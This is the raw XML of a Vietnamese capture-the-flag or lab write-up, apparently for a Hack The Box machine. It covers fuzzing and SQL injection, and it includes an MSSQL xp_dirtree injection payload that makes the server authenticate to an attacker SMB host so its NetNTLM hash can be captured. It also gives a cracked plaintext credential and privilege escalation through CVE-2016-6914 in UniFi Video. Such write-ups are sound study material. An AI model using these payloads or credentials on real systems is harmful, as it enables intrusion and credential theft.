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6CB1C" w14:textId="75806F22" w:rsidR="002F49FE" w:rsidRDefault="0054378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0B40F1" wp14:editId="09F6D7E3">
            <wp:extent cx="5943600" cy="2213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5DEA" w14:textId="0303CFE0" w:rsidR="00202D56" w:rsidRDefault="00202D56">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385FFA7A" w14:textId="0C93196B" w:rsidR="00202D56" w:rsidRDefault="00202D5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nmap --min-rate: nó quét nhanh quá nên thiếu mất cổng 5985 rồi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E33705" w14:textId="77777777" w:rsidR="00202D56" w:rsidRPr="00202D56" w:rsidRDefault="00202D56">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F1014C" w14:textId="1DC09B8C" w:rsidR="00543786" w:rsidRDefault="00202D5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1C0E46" wp14:editId="78E5379A">
            <wp:extent cx="5943600" cy="2021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1203" w14:textId="750D6671" w:rsidR="008932FF" w:rsidRDefault="008932F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8079BF8" wp14:editId="3D2950CC">
            <wp:extent cx="5943600" cy="3402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F011" w14:textId="77777777" w:rsidR="008932FF" w:rsidRDefault="008932FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F7EDC1" w14:textId="24B394D7" w:rsidR="009507AF" w:rsidRPr="00D05607" w:rsidRDefault="009507AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05607">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http</w:t>
      </w:r>
      <w:r w:rsidR="001059FA" w:rsidRPr="00D05607">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05607">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>://10.10.10.104/FUZZ -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED24B76" w14:textId="14A5F1BE" w:rsidR="009507AF" w:rsidRDefault="009507AF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D37D3E0" w14:textId="59ACB340" w:rsidR="009507AF" w:rsidRDefault="009507A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C8AFA6" wp14:editId="7322B6F6">
            <wp:extent cx="5943600" cy="445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8606" w14:textId="77777777" w:rsidR="00EE1901" w:rsidRDefault="00EE1901">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3093857B" w14:textId="67B7F2AF" w:rsidR="009507AF" w:rsidRDefault="00EE190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E611DF" wp14:editId="134859E0">
            <wp:extent cx="5023413" cy="32816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0" t="15896" r="19181" b="23648"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5034971" cy="3289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467C4" w14:textId="5BB0DC99" w:rsidR="00DA6A41" w:rsidRPr="00DA6A41" w:rsidRDefault="00DA6A4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Mình dùng wordlist </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6A41">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory-list-2.3-medium.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> để quét:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C51C9" w14:textId="77ACF98E" w:rsidR="009507AF" w:rsidRDefault="000B234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C4DF6C" wp14:editId="7503CD97">
            <wp:extent cx="5943600" cy="427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BA3E" w14:textId="66B1E15C" w:rsidR="00DA6A41" w:rsidRDefault="00DA6A41">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511F7504" w14:textId="4C94F725" w:rsidR="00EE1901" w:rsidRPr="00EE1901" w:rsidRDefault="00EE1901">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA1857" w14:textId="77777777" w:rsidR="00EE1901" w:rsidRPr="00EE1901" w:rsidRDefault="00EE1901">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0306B911" w14:textId="2761D1C4" w:rsidR="00DA6A41" w:rsidRDefault="00EE190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Giao diện trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB9151B" w14:textId="77777777" w:rsidR="00EE1901" w:rsidRDefault="00EE1901">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9A97D1" w14:textId="1B35C3FE" w:rsidR="00543786" w:rsidRDefault="00EE190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8ACA948" wp14:editId="6E36DB8B">
            <wp:extent cx="4316471" cy="2963119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9" t="15894" r="11390" b="4320"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4317531" cy="2963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5F13F" w14:textId="787B38D5" w:rsidR="00CE1434" w:rsidRDefault="00CE1434">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A403220" w14:textId="01DC0030" w:rsidR="00CE1434" w:rsidRDefault="002E7FF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Trang tìm kiếm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFDADF" w14:textId="457C8803" w:rsidR="002E7FF4" w:rsidRDefault="002E7FF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557AB454" w14:textId="42468561" w:rsidR="002E7FF4" w:rsidRDefault="0006416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75ECF48" wp14:editId="51804E3E">
            <wp:extent cx="4409440" cy="25571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38" t="15584" r="12353" b="15557"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4410772" cy="2557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7A073" w14:textId="565316D2" w:rsidR="00064165" w:rsidRDefault="00064165">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9F5539" w14:textId="6323DC9A" w:rsidR="00064165" w:rsidRDefault="005B36F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Trang web bị dính lỗ hổng SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D2FE32" w14:textId="466EC6D7" w:rsidR="005B36FA" w:rsidRDefault="005B36FA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CEF78E" w14:textId="0BBC603C" w:rsidR="005B36FA" w:rsidRDefault="003244F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3F85A72" wp14:editId="4A2CF626">
            <wp:extent cx="4281350" cy="29978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0" t="15270" r="11973" b="4002"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4282805" cy="299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481FC" w14:textId="11BB967D" w:rsidR="008545A9" w:rsidRDefault="008545A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6488E923" w14:textId="6A8683EF" w:rsidR="008545A9" w:rsidRPr="008545A9" w:rsidRDefault="008545A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008545A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Capture and crack NetNTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45805897" w14:textId="67D380DB" w:rsidR="008545A9" w:rsidRDefault="008545A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38032FE5" w14:textId="6E0B69DF" w:rsidR="008545A9" w:rsidRDefault="008545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xp_dirtree là 1 thủ tục lưu trữ của MSSQL cho phép tương tác với </w:t>
      </w:r>
      <w:r w:rsidR="00FE1DD5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hệ thống tập tin cục bộ và từ xa. Tài khoản chạy dịch vụ mssql có thể khởi tạo kết nối SMB bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014A220" w14:textId="629C9FAE" w:rsidR="008545A9" w:rsidRDefault="008545A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA6D25E" w14:textId="62354878" w:rsidR="008545A9" w:rsidRPr="00FE1DD5" w:rsidRDefault="00310178">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00310178">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1'; use master; exec xp_dirtree '\\10.10.14.8\kali';--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28896679" w14:textId="3A2CE8E7" w:rsidR="003244FC" w:rsidRDefault="003244FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EFC18E" w14:textId="2E6AE1FC" w:rsidR="003244FC" w:rsidRDefault="00675C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AB77365" wp14:editId="1BA8E66C">
            <wp:extent cx="5943600" cy="4646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39B7" w14:textId="33EF1206" w:rsidR="006F74E2" w:rsidRDefault="006F74E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75934346" w14:textId="3A911FCB" w:rsidR="006F74E2" w:rsidRDefault="006F74E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92C6373" wp14:editId="5B33989D">
            <wp:extent cx="5943600" cy="1859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7DCB" w14:textId="254FC6CA" w:rsidR="001625CA" w:rsidRDefault="001625CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0089F88C" w14:textId="35C8D58A" w:rsidR="001625CA" w:rsidRDefault="001625CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001625CA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stacy:xNnWo6272k7x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4CF91" w14:textId="578BF5F8" w:rsidR="002907D5" w:rsidRDefault="002907D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F681485" w14:textId="46E7FB99" w:rsidR="002907D5" w:rsidRDefault="002907D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46350A09" w14:textId="71F06D98" w:rsidR="00C33197" w:rsidRDefault="002D52F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33D6A59" wp14:editId="036FFCE0">
            <wp:extent cx="4271058" cy="28871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7" t="15897" r="20332" b="24898"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4284481" cy="289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51E7C" w14:textId="41FF526A" w:rsidR="00EB76C1" w:rsidRDefault="00EB76C1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B097E67" w14:textId="335B4AAE" w:rsidR="00EB76C1" w:rsidRDefault="00C3319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C347784" wp14:editId="2ACF68B3">
            <wp:extent cx="5765800" cy="1219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B44D" w14:textId="29ADC591" w:rsidR="00DD4BD0" w:rsidRDefault="00DD4BD0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A810C1E" w14:textId="206AA16C" w:rsidR="00DD4BD0" w:rsidRDefault="00DD4BD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Trong thư mục Documents của Stacy có tải phần mềm lạ: unifivideo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CDA50" w14:textId="35BF80E8" w:rsidR="003E2ABD" w:rsidRDefault="00DD4BD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2C8E6CC" wp14:editId="14A65082">
            <wp:extent cx="5562600" cy="2019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0180" w14:textId="1D634E57" w:rsidR="00DD4BD0" w:rsidRDefault="00DD4BD0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C113FC" w14:textId="1669B350" w:rsidR="00DD4BD0" w:rsidRDefault="00BD364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tìm khai thác unifivideo trên Google có 1 CVE-2016-6914 giúp mình leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010C1CD" w14:textId="4DE7C916" w:rsidR="00C00C5E" w:rsidRDefault="00C00C5E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501A3552" w14:textId="3088D96B" w:rsidR="00C00C5E" w:rsidRDefault="00C00C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Tạo taskkill.exe lưu trong thư mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00C00C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\ProgramData\unifi-video\taskkill.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF41CF" w14:textId="1C109A98" w:rsidR="003E2ABD" w:rsidRDefault="00F0149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276739C" wp14:editId="3614D88A">
            <wp:extent cx="5321300" cy="1828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83B3" w14:textId="6F5449A2" w:rsidR="004B720B" w:rsidRDefault="004B720B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F99C35E" w14:textId="72034786" w:rsidR="004B720B" w:rsidRDefault="004B720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Tìm thông tin về dịch vụ trong Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB44362" w14:textId="4089C5EB" w:rsidR="004B720B" w:rsidRDefault="004B720B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007A8E82" w14:textId="30767F51" w:rsidR="004B720B" w:rsidRPr="004B720B" w:rsidRDefault="004B720B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B720B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get-ChildItem HKLM:\SYSTEM\CurrentControlSet\Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF21D6" w14:textId="72C1FFA8" w:rsidR="004B720B" w:rsidRDefault="004B720B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1779C5F9" w14:textId="08AEA6D1" w:rsidR="004B720B" w:rsidRPr="005D21C6" w:rsidRDefault="005D21C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D21C6">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get-ChildItem HKLM:\SYSTEM\CurrentControlSet\Services | Where-Object { $_.Name -like '*UnifiVideoService*' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71768E2E" w14:textId="6C396807" w:rsidR="00F01495" w:rsidRDefault="00F01495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7158D558" w14:textId="0CFF2AFB" w:rsidR="00F01495" w:rsidRDefault="005D21C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7E4ADCA" wp14:editId="5F003B88">
            <wp:extent cx="5943600" cy="19380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D2E2" w14:textId="4A6FE9D0" w:rsidR="005D21C6" w:rsidRDefault="005D21C6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4269B5DE" w14:textId="7D13AA55" w:rsidR="005D21C6" w:rsidRDefault="00DE7AA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34942C8" wp14:editId="3735E57F">
            <wp:extent cx="5943600" cy="471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8752" w14:textId="55A64C26" w:rsidR="00063402" w:rsidRDefault="00063402">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C43547" w14:textId="187A6AA1" w:rsidR="00063402" w:rsidRDefault="003146F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69EC6EB" wp14:editId="5802D1E2">
            <wp:extent cx="5943600" cy="1568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EDCE" w14:textId="77777777" w:rsidR="00EF6B6A" w:rsidRPr="001D7084" w:rsidRDefault="00EF6B6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EF6B6A" w:rsidRPr="001D70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2B2"/>
    <w:rsid w:val="00063402"/>
    <w:rsid w:val="00064165"/>
    <w:rsid w:val="000B234F"/>
    <w:rsid w:val="001059FA"/>
    <w:rsid w:val="0013792E"/>
    <w:rsid w:val="001625CA"/>
    <w:rsid w:val="001A325D"/>
    <w:rsid w:val="001D7084"/>
    <w:rsid w:val="00202D56"/>
    <w:rsid w:val="002907D5"/>
    <w:rsid w:val="002D52FA"/>
    <w:rsid w:val="002E7FF4"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00310178"/>
    <w:rsid w:val="003146F6"/>
    <w:rsid w:val="003244FC"/>
    <w:rsid w:val="003E2ABD"/>
    <w:rsid w:val="004B720B"/>
    <w:rsid w:val="00543786"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005B36FA"/>
    <w:rsid w:val="005D21C6"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006502B2"/>
    <w:rsid w:val="00675CDF"/>
    <w:rsid w:val="0068715C"/>
    <w:rsid w:val="006F74E2"/>
    <w:rsid w:val="008545A9"/>
    <w:rsid w:val="008932FF"/>
    <w:rsid w:val="009507AF"/>
    <w:rsid w:val="009A47EB"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BD364C"/>
    <w:rsid w:val="00C00C5E"/>
    <w:rsid w:val="00C33197"/>
    <w:rsid w:val="00CE1434"/>
    <w:rsid w:val="00D05607"/>
    <w:rsid w:val="00DA6A41"/>
    <w:rsid w:val="00DD4BD0"/>
    <w:rsid w:val="00DE7AAD"/>
    <w:rsid w:val="00E101CE"/>
    <w:rsid w:val="00EB76C1"/>
    <w:rsid w:val="00EE1901"/>
    <w:rsid w:val="00EF6B6A"/>
    <w:rsid w:val="00F01495"/>
    <w:rsid w:val="00FE1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C76D603"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{139CE768-B098-E544-A268-1606B96B5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39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-24T02:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-25T04:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>